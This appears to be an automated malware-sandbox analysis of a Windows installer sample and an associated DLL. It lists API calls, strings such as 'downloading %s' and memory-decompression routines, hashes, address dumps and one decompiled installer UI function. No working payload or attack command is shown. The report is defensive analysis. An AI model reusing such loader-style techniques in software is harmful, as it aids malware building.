                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f6e
                                                                                                                                                    0x00402f70
                                                                                                                                                    0x00402fb5
                                                                                                                                                    0x00402fb6
                                                                                                                                                    0x00401957
                                                                                                                                                    0x00401957
                                                                                                                                                    0x0040195c
                                                                                                                                                    0x004017ab
                                                                                                                                                    0x004017ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004017ab
                                                                                                                                                    0x00402f7d
                                                                                                                                                    0x00402f86
                                                                                                                                                    0x00402f8b
                                                                                                                                                    0x00402f93
                                                                                                                                                    0x00402f96
                                                                                                                                                    0x00402fa4
                                                                                                                                                    0x00402f98
                                                                                                                                                    0x00402f98
                                                                                                                                                    0x00402f98
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402fc0
                                                                                                                                                    0x00402fc2
                                                                                                                                                    0x00402fc7
                                                                                                                                                    0x00402fca
                                                                                                                                                    0x00402fd0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402fd6
                                                                                                                                                    0x00402fd8
                                                                                                                                                    0x00402fdb
                                                                                                                                                    0x00402fe1
                                                                                                                                                    0x00402fe7
                                                                                                                                                    0x00402fe9
                                                                                                                                                    0x00403003
                                                                                                                                                    0x00403003
                                                                                                                                                    0x00403005
                                                                                                                                                    0x00403008
                                                                                                                                                    0x0040301a
                                                                                                                                                    0x0040301e
                                                                                                                                                    0x00403023
                                                                                                                                                    0x00403023
                                                                                                                                                    0x00403023
                                                                                                                                                    0x0040300a
                                                                                                                                                    0x0040300a
                                                                                                                                                    0x0040300c
                                                                                                                                                    0x00403012
                                                                                                                                                    0x00403012
                                                                                                                                                    0x0040302a
                                                                                                                                                    0x0040302d
                                                                                                                                                    0x00403030
                                                                                                                                                    0x00403033
                                                                                                                                                    0x00403036
                                                                                                                                                    0x0040303f
                                                                                                                                                    0x0040303f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403036
                                                                                                                                                    0x00402feb
                                                                                                                                                    0x00402fee
                                                                                                                                                    0x00402ffa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402ffa
                                                                                                                                                    0x00402ff3
                                                                                                                                                    0x00402ff4
                                                                                                                                                    0x00402e4b
                                                                                                                                                    0x00402e4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403049
                                                                                                                                                    0x0040304b
                                                                                                                                                    0x00403050
                                                                                                                                                    0x00403053
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00403059
                                                                                                                                                    0x0040305c
                                                                                                                                                    0x0040307d
                                                                                                                                                    0x00403080
                                                                                                                                                    0x00403094
                                                                                                                                                    0x004030a2
                                                                                                                                                    0x00403082
                                                                                                                                                    0x00403082
                                                                                                                                                    0x00403085
                                                                                                                                                    0x0040308b
                                                                                                                                                    0x0040308b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403080
                                                                                                                                                    0x0040305e
                                                                                                                                                    0x00403061
                                                                                                                                                    0x00403073
                                                                                                                                                    0x00402dcf
                                                                                                                                                    0x00402dcf
                                                                                                                                                    0x00402dd0
                                                                                                                                                    0x00402dd0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402dd0
                                                                                                                                                    0x0040306b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004030af
                                                                                                                                                    0x004030b7
                                                                                                                                                    0x004030bd
                                                                                                                                                    0x004030c0
                                                                                                                                                    0x004030c7
                                                                                                                                                    0x004030c7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004030d1
                                                                                                                                                    0x004030d7
                                                                                                                                                    0x004030dc
                                                                                                                                                    0x004030dc
                                                                                                                                                    0x004030dd
                                                                                                                                                    0x004030dd
                                                                                                                                                    0x004030de
                                                                                                                                                    0x004030de
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                    • GetShortPathNameW.KERNEL32 ref: 004019BF
                                                                                                                                                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                    Strings
                                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                                                                    • Opcode ID: 0aacebd35cab78dd9e56fb0c34c611705e18b02e61851c41ce70807ba0770869
                                                                                                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                    • Opcode Fuzzy Hash: 0aacebd35cab78dd9e56fb0c34c611705e18b02e61851c41ce70807ba0770869
                                                                                                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6247D0, Relevance: 49.3, APIs: 23, Strings: 5, Instructions: 332memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62482D
                                                                                                                                                      • Part of subcall function 6E631050: _DebugHeapAllocator.LIBCPMTD ref: 6E6310C6
                                                                                                                                                      • Part of subcall function 6E631050: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E6310D2
                                                                                                                                                      • Part of subcall function 6E631050: std::ios_base::good.LIBCPMTD ref: 6E6310DA
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624852
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624876
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6248B2
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624954
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62499D
                                                                                                                                                    • PathFileExistsW.KERNELBASE(00000000,?,?,?,3920FDCC), ref: 6E624BB9
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624BDF
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp, xrefs: 6E624A2A
                                                                                                                                                    • downloading %s, xrefs: 6E624939
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp, xrefs: 6E624B4E
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp, xrefs: 6E6248E8
                                                                                                                                                    • |ohn, xrefs: 6E624836, 6E624BA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork$ExistsFilePathstd::ios_base::good
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$downloading %s$|ohn
                                                                                                                                                    • API String ID: 1817047942-2045548172
                                                                                                                                                    • Opcode ID: 5e2e19ee3be7ce49bb97ffb200f2d566b806e7f73094093f331c96d6a2b4f1fc
                                                                                                                                                    • Instruction ID: 18b6233beabcfc446205f3ec83f0f1be22fa3122131c6016a769c110f59b6d68
                                                                                                                                                    • Opcode Fuzzy Hash: 5e2e19ee3be7ce49bb97ffb200f2d566b806e7f73094093f331c96d6a2b4f1fc
                                                                                                                                                    • Instruction Fuzzy Hash: 4DD12870D10209AFDB04DBE4DD95BEEB778AF15318F104928E416AB2D0EB746A48CF69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405958, Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E00405958(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				intOrPtr _v20;
				short _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t28;
				short _t29;
				short _t30;
				void* _t39;
				void* _t41;
				int _t42;
				void* _t45;
				struct HINSTANCE__* _t48;
				int _t49;
				int _t53;
				short _t75;
				WCHAR* _t77;
				signed char _t81;
				short* _t83;
				short _t90;
				intOrPtr _t91;
				WCHAR* _t94;
				intOrPtr _t96;
				WCHAR* _t101;

				_t89 = __ecx;
				_t96 =  *0x47eabc;
				_t28 = E00406328(6);
				_t103 = _t28;
				if(_t28 == 0) {
					_t29 = 0x30;
					 *0x4df0c0 = _t29;
					_t30 = 0x78;
					_t94 = 0x451d98;
					 *0x4df0c2 = _t30;
					 *0x4df0c4 = 0;
					E00405EFF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x451d98, 0);
					__eflags =  *0x451d98;
					if(__eflags == 0) {
						E00405EFF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M0040A4A4, 0x451d98, 0);
					}
					lstrcatW(0x4df0c0, _t94);
				} else {
					E00405F7D(0x4df0c0,  *_t28() & 0x0000ffff);
				}
				E00403EC1(_t89, _t103);
				 *0x47eb60 =  *0x47eb08 & 0x00000020;
				 *0x47eb7c = 0x10000;
				if(E004067AA(_t103, 0x4d30a8) != 0) {
					L16:
					if(E004067AA(_t112, 0x4d30a8) == 0) {
						E00406831(0, _t94, _t96, 0x4d30a8,  *((intOrPtr*)(_t96 + 0x118)));
					}
					if(( *0x47eb08 & 0x00000010) != 0 &&  *0x47eb04 == 0) {
						E00403EA0();
						 *0x46d204 = 1;
					}
					_t39 = LoadImageW( *0x47eab8, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x476a70 = _t39;
					if( *((intOrPtr*)(_t96 + 0x50)) == 0xffffffff) {
						L24:
						if(E0040141D(0) == 0) {
							_t41 = E00403EC1(_t89, __eflags);
							__eflags =  *0x47eb80;
							if( *0x47eb80 != 0) {
								_t42 = E00405073(_t41, 0);
								__eflags = _t42;
								if(_t42 == 0) {
									E0040141D(1);
									goto L36;
								}
								__eflags =  *0x476a74;
								if( *0x476a74 == 0) {
									E0040141D(2);
								}
								goto L25;
							}
							ShowWindow( *0x441d70, 5);
							_t48 = LoadLibraryW(L"RichEd20");
							__eflags = _t48;
							if(_t48 == 0) {
								LoadLibraryW(L"RichEd32");
							}
							_t101 = L"RichEdit20A";
							_t49 = GetClassInfoW(0, _t101, 0x476a40);
							__eflags = _t49;
							if(_t49 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x476a40);
								 *0x476a64 = _t101;
								RegisterClassW(0x476a40);
							}
							_t53 = DialogBoxParamW( *0x47eab8,  *0x476a7c + 0x00000069 & 0x0000ffff, 0, E004054A5, 0);
							E00403C94(E0040141D(5), 1);
							return _t53;
						}
						L25:
						_t45 = 2;
						return _t45;
					} else {
						_t90 =  *L"_Nb"; // 0x4e005f
						_v24 = _t90;
						_t91 =  *0x40a404; // 0x62
						_v20 = _t91;
						_t89 =  *0x47eab8;
						 *0x476a54 = _t39;
						 *0x476a44 = E00401000;
						 *0x476a50 =  *0x47eab8;
						 *0x476a64 =  &_v24;
						if(RegisterClassW(0x476a40) == 0) {
							L36:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x441d70 = CreateWindowExW(0x80,  &_v24, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x47eab8, 0);
						goto L24;
					}
				} else {
					_t89 =  *(_t96 + 0x48);
					if( *(_t96 + 0x48) == 0) {
						goto L16;
					}
					_t94 = 0x46e220;
					E00405EFF( *((intOrPtr*)(_t96 + 0x44)),  *0x47ead8 + _t89 * 2,  *0x47ead8 +  *(_t96 + 0x4c) * 2, 0x46e220, 0);
					_t75 =  *0x46e220;
					if(_t75 == 0) {
						goto L16;
					}
					if(_t75 == 0x22) {
						_t94 = 0x46e222;
						_t83 = E00405D32(0x46e222, 0x22);
						_t89 = 0;
						 *_t83 = 0;
					}
					_t9 = lstrlenW(_t94) * 2; // 0x46e21a
					_t77 = _t94 + _t9 - 8;
					if(_t77 <= _t94 || lstrcmpiW(_t77, L".exe") != 0) {
						L15:
						E00406035(0x4d30a8, E0040674E(_t94));
						goto L16;
					} else {
						_t81 = GetFileAttributesW(_t94);
						if(_t81 == 0xffffffff) {
							L14:
							E0040677D(_t94);
							goto L15;
						}
						_t112 = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}































                                                                                                                                                    0x00405958
                                                                                                                                                    0x0040595e
                                                                                                                                                    0x00405967
                                                                                                                                                    0x0040596e
                                                                                                                                                    0x00405970
                                                                                                                                                    0x00405986
                                                                                                                                                    0x00405989
                                                                                                                                                    0x0040598f
                                                                                                                                                    0x00405991
                                                                                                                                                    0x00405998
                                                                                                                                                    0x004059aa
                                                                                                                                                    0x004059b0
                                                                                                                                                    0x004059b5
                                                                                                                                                    0x004059bc
                                                                                                                                                    0x004059cf
                                                                                                                                                    0x004059cf
                                                                                                                                                    0x004059da
                                                                                                                                                    0x00405972
                                                                                                                                                    0x0040597d
                                                                                                                                                    0x0040597d
                                                                                                                                                    0x004059df
                                                                                                                                                    0x004059f2
                                                                                                                                                    0x004059f7
                                                                                                                                                    0x00405a08
                                                                                                                                                    0x00405a9c
                                                                                                                                                    0x00405aa4
                                                                                                                                                    0x00405aad
                                                                                                                                                    0x00405aad
                                                                                                                                                    0x00405ab9
                                                                                                                                                    0x00405ac3
                                                                                                                                                    0x00405ac8
                                                                                                                                                    0x00405ac8
                                                                                                                                                    0x00405ae3
                                                                                                                                                    0x00405ae9
                                                                                                                                                    0x00405af7
                                                                                                                                                    0x00405b92
                                                                                                                                                    0x00405b9a
                                                                                                                                                    0x00405ba4
                                                                                                                                                    0x00405ba9
                                                                                                                                                    0x00405baf
                                                                                                                                                    0x00405c39
                                                                                                                                                    0x00405c3e
                                                                                                                                                    0x00405c40
                                                                                                                                                    0x00405c5c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405c5c
                                                                                                                                                    0x00405c42
                                                                                                                                                    0x00405c48
                                                                                                                                                    0x00405c50
                                                                                                                                                    0x00405c50
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405c48
                                                                                                                                                    0x00405bbd
                                                                                                                                                    0x00405bce
                                                                                                                                                    0x00405bd0
                                                                                                                                                    0x00405bd2
                                                                                                                                                    0x00405bd9
                                                                                                                                                    0x00405bd9
                                                                                                                                                    0x00405be2
                                                                                                                                                    0x00405be9
                                                                                                                                                    0x00405beb
                                                                                                                                                    0x00405bed
                                                                                                                                                    0x00405bf6
                                                                                                                                                    0x00405bf9
                                                                                                                                                    0x00405bff
                                                                                                                                                    0x00405bff
                                                                                                                                                    0x00405c1e
                                                                                                                                                    0x00405c2f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405c34
                                                                                                                                                    0x00405b9c
                                                                                                                                                    0x00405b9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405afd
                                                                                                                                                    0x00405afd
                                                                                                                                                    0x00405b03
                                                                                                                                                    0x00405b07
                                                                                                                                                    0x00405b0d
                                                                                                                                                    0x00405b11
                                                                                                                                                    0x00405b17
                                                                                                                                                    0x00405b21
                                                                                                                                                    0x00405b2b
                                                                                                                                                    0x00405b31
                                                                                                                                                    0x00405b3f
                                                                                                                                                    0x00405c61
                                                                                                                                                    0x00405c61
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405c61
                                                                                                                                                    0x00405b4e
                                                                                                                                                    0x00405b8d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405b8d
                                                                                                                                                    0x00405a0e
                                                                                                                                                    0x00405a0e
                                                                                                                                                    0x00405a13
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405a22
                                                                                                                                                    0x00405a33
                                                                                                                                                    0x00405a38
                                                                                                                                                    0x00405a41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405a47
                                                                                                                                                    0x00405a4b
                                                                                                                                                    0x00405a51
                                                                                                                                                    0x00405a56
                                                                                                                                                    0x00405a58
                                                                                                                                                    0x00405a58
                                                                                                                                                    0x00405a61
                                                                                                                                                    0x00405a61
                                                                                                                                                    0x00405a67
                                                                                                                                                    0x00405a8f
                                                                                                                                                    0x00405a97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405a79
                                                                                                                                                    0x00405a7a
                                                                                                                                                    0x00405a83
                                                                                                                                                    0x00405a89
                                                                                                                                                    0x00405a8a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405a8a
                                                                                                                                                    0x00405a85
                                                                                                                                                    0x00405a87
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405a87
                                                                                                                                                    0x00405a67

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98), ref: 004059DA
                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    • LoadImageW.USER32 ref: 00405AE3
                                                                                                                                                    • RegisterClassW.USER32 ref: 00405B36
                                                                                                                                                    • SystemParametersInfoW.USER32 ref: 00405B4E
                                                                                                                                                    • CreateWindowExW.USER32 ref: 00405B87
                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BCE
                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                    • GetClassInfoW.USER32 ref: 00405BE9
                                                                                                                                                    • GetClassInfoW.USER32 ref: 00405BF6
                                                                                                                                                    • RegisterClassW.USER32 ref: 00405BFF
                                                                                                                                                    • DialogBoxParamW.USER32 ref: 00405C1E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                    • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                    • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64AE70, Relevance: 36.9, APIs: 12, Strings: 9, Instructions: 187memorylibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,3920FDCC), ref: 6E64AEA4
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,06000000,00003000,00000004), ref: 6E64B097
                                                                                                                                                    • GetLastError.KERNEL32(?,?,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp), ref: 6E64B0AC
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E64AEB3
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 6E64AF08
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 6E64AF1C
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 6E64AF31
                                                                                                                                                    • GetLastError.KERNEL32(?,?,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp), ref: 6E64AF5D
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 6E64AFB9
                                                                                                                                                    • GetLastError.KERNEL32(?,?,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp), ref: 6E64AFCE
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,05C00000,00003000,00000004), ref: 6E64B028
                                                                                                                                                    • GetLastError.KERNEL32(?,?,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp), ref: 6E64B03D
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6E64AF66
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6E64B046
                                                                                                                                                    • ntdll.dll, xrefs: 6E64AE9F
                                                                                                                                                    • RtlDecompressBuffer, xrefs: 6E64AF28
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6E64B0B5
                                                                                                                                                    • RtlGetCompressionWorkSpaceSize, xrefs: 6E64AF13
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6E64AEBC
                                                                                                                                                    • RtlCompressBuffer, xrefs: 6E64AEFF
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6E64AFD7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$AddressAllocProcVirtual$Base::Concurrency::details::ContextHandleIdentityModuleQueueWork
